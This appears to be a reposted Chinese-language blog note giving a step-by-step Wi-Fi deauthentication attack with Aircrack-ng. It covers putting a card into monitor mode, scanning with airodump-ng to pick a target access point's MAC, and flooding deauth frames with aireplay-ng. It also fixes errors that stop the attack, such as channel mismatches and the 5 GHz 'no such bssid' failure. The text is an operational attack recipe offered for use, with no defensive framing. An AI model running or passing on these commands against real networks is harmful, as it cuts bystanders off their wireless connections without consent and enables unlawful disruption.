WIFI DeAuth攻擊-爬坑筆記


這里用Aircrack這款工具進行講解並在我實際操作中遇到的問題解決方法:
准備工作:無線網卡連接電腦或者虛擬機(免驅的最好),如需驅動請自行安裝驅動
1.將無線網卡接入測試電腦Linux虛擬機(裝有Aircrack-ng)
2.測試電腦使用Linux虛擬機
3.在kali的命令行中輸入ifconfig,查看無線網卡是否成功連接至系統(出現了名為wlan0的無線網卡則是成功連接)
4.使用命令ifconfig wlan0 up啟用無線網卡
5.使用命令airmon-ng start wlan0 將網卡設置為監聽模式(開啟混雜模式才能嗅探所有經過網卡的數據包)

6.使用命令ifconfig查看網卡是否開啟監聽模式

 7.監聽模式開啟成功后,使用命令airodump-ng wlan0對當前環境的無線網絡進行嗅探,根據SSID確認攻擊目標,並記錄目標MAC(wlan0為激活監聽模式的無線網卡名稱)

 8.使用命令aireplay-ng -0 100 –a AP的mac wlan0進行DeAuth攻擊(-0 采用deauth攻擊模式,100為攻擊次數,-a 后跟AP的MAC地址,-c 后跟客戶端的MAC地址)

如果出現以下問題:
解決辦法使用以下命令:sudo airmon-ng start wlan0 1 或者 iwconfig wlan0mon channel 1
在處理5Ghz的wifi,在鎖定目標wifi后使用aireplay-ng指令抓取握手包時在確定無語法錯誤等問題的前提下仍然報錯“no such bssid available.”的解決方法加-D參數 具體使用:aireplay-ng -0 1000 -a AA:AA:AA:AA:AA -c BB:BB:BB:BB:BB -D wlan0
9.解決所有問題開始進行攻擊,在攻擊期間內,目標熱點斷開即為攻擊成功

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM